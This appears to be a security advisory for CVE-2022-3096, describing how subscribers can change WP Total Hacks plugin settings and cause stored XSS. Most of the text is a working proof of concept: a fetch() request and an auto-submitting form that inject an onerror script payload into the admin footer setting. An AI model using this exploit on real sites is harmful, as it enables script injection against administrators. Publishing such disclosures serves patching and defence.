WP Total Hacks <= 4.7.2 – Subscriber+ Arbitrary Options Update to Stored XSS | CVE 2022-3096

Description

The plugin does not prevent low privilege users from modifying the plugin's settings. This could allow users such as subscribers to perform Stored Cross-Site Scripting attacks against other users, like administrators, due to the lack of sanitisation and escaping as well.

Proof of Concept

Run the below command in the developer console of the web browser while being on the blog as a subscriber user

await fetch("/wp-admin/", {
    "credentials": "include",
    "body": "wpbiz-nonce=aaa&tabid=total-hacks-admin&wfb_favicon=&wfb_admin_favicon=&wfb_apple_icon=&wfb_remove_xmlrpc=&wfb_hide_version=&wfb_remove_more=&wfb_remove_excerpt=&wfb_disallow_pingback=&wfb_google_analytics=wwwww&wfb_google=ttttt&wfb_bing=&wfb_revision=&wfb_selfping=&wfb_pageexcerpt=&wfb_createpagefordraft=&wfb_custom_logo=&wfb_admin_footer_text=<img src=x onerror=alert(1)>&wfb_login_logo=&wfb_login_url=&wfb_login_title=&wfb_shortcode=&wfb_oembed=&wfb_webmaster=&wfb_sendername=&wfb_emailaddress=&wfb_update_notification=&submit=%C3%84nderungen+speichern",
    "method": "POST",
    "mode": "cors"
});


<form id="test" action="https://example.com/wp-admin/" method="post">
  <input type="text" name="wpbiz-nonce" value="aaa">
  <input type="text" name="tabid" value="total-hacks-admin">
  <input type="text" name="wfb_favicon" value="">
  <input type="text" name="wfb_admin_favicon" value="">
  <input type="text" name="wfb_apple_icon" value="">
  <input type="text" name="wfb_remove_xmlrpc" value="">
  <input type="text" name="wfb_hide_version" value="">
  <input type="text" name="wfb_remove_more" value="">
  <input type="text" name="wfb_remove_excerpt" value="">
  <input type="text" name="wfb_disallow_pingback" value="">
  <input type="text" name="wfb_google_analytics" value="wwwww">
  <input type="text" name="wfb_google" value="ttttt">
  <input type="text" name="wfb_bing" value="">
  <input type="text" name="wfb_revision" value="">
  <input type="text" name="wfb_selfping" value="">
  <input type="text" name="wfb_pageexcerpt" value="">
  <input type="text" name="wfb_createpagefordraft" value="">
  <input type="text" name="wfb_custom_logo" value="">
  <input type="text" name="wfb_admin_footer_text" value="<img src=x onerror=alert(1)>">
  <input type="text" name="wfb_login_logo" value="">
  <input type="text" name="wfb_login_url" value="">
  <input type="text" name="wfb_login_title" value="">
  <input type="text" name="wfb_shortcode" value="">
  <input type="text" name="wfb_oembed" value="">
  <input type="text" name="wfb_webmaster" value="">
  <input type="text" name="wfb_sendername" value="">
  <input type="text" name="wfb_emailaddress" value="">
  <input type="text" name="wfb_update_notification" value="">
</form>
<script>
    document.getElementById("test").submit();
</script>